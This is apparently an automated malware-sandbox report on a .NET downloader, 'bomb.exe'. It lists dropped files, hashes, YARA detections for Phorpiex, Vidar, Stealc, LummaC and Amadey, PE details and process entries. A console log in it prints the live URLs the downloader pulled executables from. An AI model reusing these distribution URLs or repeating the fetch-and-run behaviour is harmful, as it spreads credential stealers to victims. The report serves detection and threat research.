SSDEEP:	49152:KfuaMm44Xnz/IYkmjVcIhGWczrYfRX9Iu14k85M7xgc6jbb36ST9llys58JLNQuC:WzRkmELkpX9RFXEb36Y9l9201LcDS
MD5:	117CD56896073EAA680D408FE7FB51C8
SHA1:	A9DB5E8F4E79D5E099A1E2A6D894D6D6D9283D03
SHA-256:	9B985F2AF040A18F231B1C4851365E8F10A5EF394F455306FDC8F395B374F01E
SHA-512:	C9854C250B669078F5095ED6093568DB33F2B93E0EAA96E8E7BF97DEE4E48374943B68CBFB7DD513C520B4EBF980B390EB7FC372BB59F69BC08F19ED7614F8A4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..f.._.S%.........#..G..RZ...f...........G...@...................................e....... ......................0..B....@...............................p..."..........................4.H......................A...............................text.....G.......G.................`.P`.data.........G.......G.............@.`..rdata..X.....H.......G.............@.`@/4......(.....H.......H.............@.0@.bss....T.f..@L.......................`..edata..B....0.......$L.............@.0@.idata.......@.......&L.............@.0..CRT....4....P.......0L.............@.0..tls.........`.......2L.............@.0..reloc..."...p...$...4L.............@.0B/14..................XZ.............@..B/29.................`Z.............@..B/41.....XL...`...N....\.............@..B/55.....B............V\.............@..B/67.....T............:].............@.0B/80.....a............X].

C:\Users\user\sysvplervcs.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\323057790.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	6.300629641809532
Encrypted:	false
SSDEEP:	1536:y7zFjdFmav82XA3I9XRH5McIu9Xh0TRvfQaQG9MF7vnn:uRyOPA3MfCwR0toZF7vn
MD5:	930C41BC0C20865AF61A95BCF0C3B289
SHA1:	CECF37C3B6C76D9A79DD2A97CFC518621A6AC924
SHA-256:	1F2E9724DFB091059AE16C305601E21D64B5308DF76DDEF6B394573E576EF1FF
SHA-512:	FA1F33C71DA608B3980038981220FCEBEE0B0CC44331E52F5198DD2761C97631EE8286756C2CC16245A1370C83BB53CC8EA8EF64E0FCDD30AF51F023973986B2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysvplervcs.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g............................@y............@.........................................................................\|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data...H_...@...N...2..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\tbtnds.dat

Download File

Process:	C:\Users\user\sysvplervcs.exe
File Type:	data
Category:	dropped
Size (bytes):	4088
Entropy (8bit):	4.758707117531139
Encrypted:	false
SSDEEP:	96:ua6J43CQ/T+EkMP9KZyB2xHNh+RAN4Fj2E+ar7h6lw9JplpDCUl7FbX:uaW43LKyLB2xHv+ygjXJ6l+lZCUl7FbX
MD5:	E2A155399A68439C3B9BE02E04704E0C
SHA1:	189CFF627A5DC9F1280193214A8A08FE8A571026
SHA-256:	905B070A21130DD5453DBF3463767CDB112D51B4BF28D83A48ED63F1A11A59CB
SHA-512:	C25A75536AF123728F6A3560089D63846B3555B3F58606287354A50F49FE44BF83E142A682EA5050B30CBA6CFB0D4449A83054001BE4DE83517C051E5A2D132C
Malicious:	false
Preview:	Z.......?.......py;......-......................................._HQ+....Z..7....^..?......&.............Z..........%............_:[F....Z..j....Q.0....{.......2......Z........-.....\/......U.............m.$..............6#.......J......2R......[W.......!......l\....U.^g...........[.:....m......Z..?......S.....2v...........Z..8......E6..........}JcI....................6.......$(..........m}.c....R.......W.......................%x...............[[.......G.....].U.....^.......V>......Z..G.............M....S...............k......_.......-....................Z......^..J.............m....Y.#.......,.....\.d.....Z.................x6....%.1 ............Z..B.............D...._9.......Jx6...........Y.>.....%..............W..V....u.........L....^..).......<...._.W.......~........!....Y#.p....Z.......x........E.......s....Z......... .......*.....Yj.:....^.............%.......].S.......P...._;......M.......Z.......8.R....V>.C....[z.v...........>......

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466372243157076
Encrypted:	false
SSDEEP:	6144:gIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNEdwBCswSbOl:lXD94+WlLZMM6YFHO+Ol
MD5:	82EFD2AEA40C0EB3E8FC1839EBFA238E
SHA1:	1B23971BFCC2D3DB351800301F366E75DAA045CD
SHA-256:	FF55CA4393034A92545C053515F81FE31F655EC9FD036705BA567D8B0B4AD528
SHA-512:	7A629F91401D56BE6269C7344F39228A01719F1B0E90B0324E866BA262091E797AEC908F87CCB0B6418DCF1B56A476963E73CAEE6876497CD18292E042246AC7
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ.@.................................................................................................................................................................................................................................................................................................................................................N.t........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\sysvplervcs.exe

Download File

Process:	C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	6.300629641809532
Encrypted:	false
SSDEEP:	1536:y7zFjdFmav82XA3I9XRH5McIu9Xh0TRvfQaQG9MF7vnn:uRyOPA3MfCwR0toZF7vn
MD5:	930C41BC0C20865AF61A95BCF0C3B289
SHA1:	CECF37C3B6C76D9A79DD2A97CFC518621A6AC924
SHA-256:	1F2E9724DFB091059AE16C305601E21D64B5308DF76DDEF6B394573E576EF1FF
SHA-512:	FA1F33C71DA608B3980038981220FCEBEE0B0CC44331E52F5198DD2761C97631EE8286756C2CC16245A1370C83BB53CC8EA8EF64E0FCDD30AF51F023973986B2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysvplervcs.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g............................@y............@.........................................................................\|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data...H_...@...N...2..............@...................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	4795
Entropy (8bit):	5.3934609425737
Encrypted:	false
SSDEEP:	48:KM65w+kr/hYMo+Ede8+ZgnRSuRuqj+ZgGm0yQCbcR+Zgs0u+c7UZcPT51+Zp+Zg/:Kf5w+kr/aMFG7QuASb0yQtY08QZiXIr
MD5:	83E65462617FEF433C17C6D51B1F541C
SHA1:	084E659D77051D8110681F5E6CCE90164217D9DB
SHA-256:	F02DCA5ECBCC8FB315C2C325230838F29F2B9904B6F4C854DF0DA62BE9FC8A8E
SHA-512:	1BF4F61B22821B4D20436330BB7BB7051CF083AE31C760154AE83AF740E1F7039309A91AD675349D469CED71A5FF15F1565BB193CE20A8FE77245E46866B8E20
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
Preview:	[+] Downloading http://185.215.113.66/newtpp.exe..[+] Downloading http://185.215.113.66/pei.exe..[+] Downloading http://77.105.161.194/file/1.exe...[+] Downloading http://jask.powerforxes.shop/ldms/fedf8679e8d2.exe#d12...[+] Downloading http://147.45.44.104/malesa/66fd20ad95baf_Notepad.exe#us111...[+] Downloading http://186.169.83.212/PSE-GOOGLE.exe...[+] http185.215.113.66pei.exe.exe..[+] http185.215.113.66newtpp.exe.exe..[+] Downloading http://77.105.161.194/file/carrier_ratecon.exe...[+] Downloading http://77.105.161.194/pdf/file.exe...[+] httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe..[+] http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe..[+] Downloading http://hit-check.com/test_gate0117.php.?id=user&mn=114127&os=6.2 build: 9200..[+] Downloading http://males.mugutu.com/revada/66df29a06624c_cry.exe...[+] http77.105.161.194file1.exe.exe..[+] Downloading http://males.mugutu.com/yuop/66bf353c38733_Grids.exe...System.Net.WebException: The remote server returned an err

\Device\Mup\user-PC\PIPE\samr

Download File

Process:	C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.438743916256937
Encrypted:	false
SSDEEP:	3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
MD5:	E467C82627F5E1524FDB4415AF19FC73
SHA1:	B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
SHA-256:	116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
SHA-512:	2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
Malicious:	false
Preview:	................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.559951984937879
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	bomb.exe
File size:	12'288 bytes
MD5:	55dba6e7aa4e8cc73415f4e3f9f6bdae
SHA1:	87c9f29d58f57a5e025061d389be2655ee879d5d
SHA256:	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a
SHA512:	f2eb91e812b2ba58c4309fd44edadc8977367c7d9d6214d7e70a0392ae8427d570746ae57cca68dc260901f664f2e8c6c5387118ff01d243abeb5680abe2a352
SSDEEP:	192:vnpYaU28zxHdo4ZMgQl9q+4ua7HhdSbwxz1ULU87glpK/b26J4Uf1XXr5:vWZdoWMR96uaLhM6ULU870gJR
TLSH:	24423E18BAF94335E77BCB3D58B7920195787746E802CB2C85F61A4D141B7026DE0E3E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~u............"...0..&..........zE... ...`....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40457a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x93BF757E [Sun Jul 19 19:03:26 2048 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4527	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x55c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x44b4	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2580	0x2600	08033d13bc73373c46c91c018770a9e6	False	0.4256784539473684	data	4.822162199138226	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x55c	0x600	0ad1e3fdcf47df39f60c9d399ee4c8f7	False	0.396484375	data	3.8964273445359865	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8000	0xc	0x200	6af24829c5a3d4e2d2742d9b56ac77bd	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x6090	0x2cc	data			0.43435754189944137
RT_MANIFEST	0x636c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Target ID:	0
Start time:	02:53:03
Start date:	05/10/2024
Path:	C:\Users\user\Desktop\bomb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\bomb.exe"
Imagebase:	0x1342d920000
File size:	12'288 bytes
MD5 hash:	55DBA6E7AA4E8CC73415F4E3F9F6BDAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2651263420.000001342F7AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:53:03
Start date:	05/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:53:14
Start date:	05/10/2024
Path:	C:\Users\user\Desktop\http185.215.113.66pei.exe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\http185.215.113.66pei.exe.exe"
Imagebase:	0x840000
File size:	9'728 bytes
MD5 hash:	8D8E6C7952A9DC7C0C73911C4DBC5518
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:53:14
Start date:	05/10/2024
Path:	C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe"
Imagebase:	0x400000
File size:	98'304 bytes
MD5 hash:	930C41BC0C20865AF61A95BCF0C3B289
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000000.1851991589.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000002.1911911144.000000000067E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:53:14
Start date:	05/10/2024
Path:	C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe"
Imagebase:	0xee0000
File size:	564'224 bytes
MD5 hash:	207386C6A291C524E69D51A356F8352C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:53:14
Start date:	05/10/2024
Path:	C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe"
Imagebase:	0x3d0000
File size:	814'592 bytes
MD5 hash:	FCFFB8B429A1BD3DEB45AA076909C6B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.4297613922.0000000003749000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:53:14
Start date:	05/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x180000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:53:14
Start date:	05/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xf40000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: HiddenCobra_BANKSHOT_Gen, Description: Detects Hidden Cobra BANKSHOT trojan, Source: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:53:14
Start date:	05/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:53:14
Start date:	05/10/2024
Path:	C:\Users\user\Desktop\http77.105.161.194file1.exe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\http77.105.161.194file1.exe.exe"
Imagebase:	0x400000
File size:	1'161'840 bytes
MD5 hash:	774C8215DA3CB73644D36CA3F60E676B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 13%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:53:14
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7112 -ip 7112
Imagebase:	0x980000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:53:14
Start date:	05/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff70f330000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:53:15
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 280
Imagebase:	0x980000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:53:16
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Tits Tits.bat & Tits.bat
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:53:16
Start date:	05/10/2024
Path:	C:\Windows\sysvplervcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\sysvplervcs.exe
Imagebase:	0x400000
File size:	98'304 bytes
MD5 hash:	930C41BC0C20865AF61A95BCF0C3B289
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 0000000F.00000000.1882503312.0000000000410000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 0000000F.00000002.1908225903.0000000000410000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysvplervcs.exe, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:53:16
Start date:	05/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:53:16
Start date:	05/10/2024
Path:	C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe"
Imagebase:	0x4d0000
File size:	210'472 bytes
MD5 hash:	588DA7A05FE6D237B82EA541C0E9D1CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.1910895960.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 92%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:53:16
Start date:	05/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:53:17
Start date:	05/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xdf0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000002.1890590465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:53:20
Start date:	05/10/2024
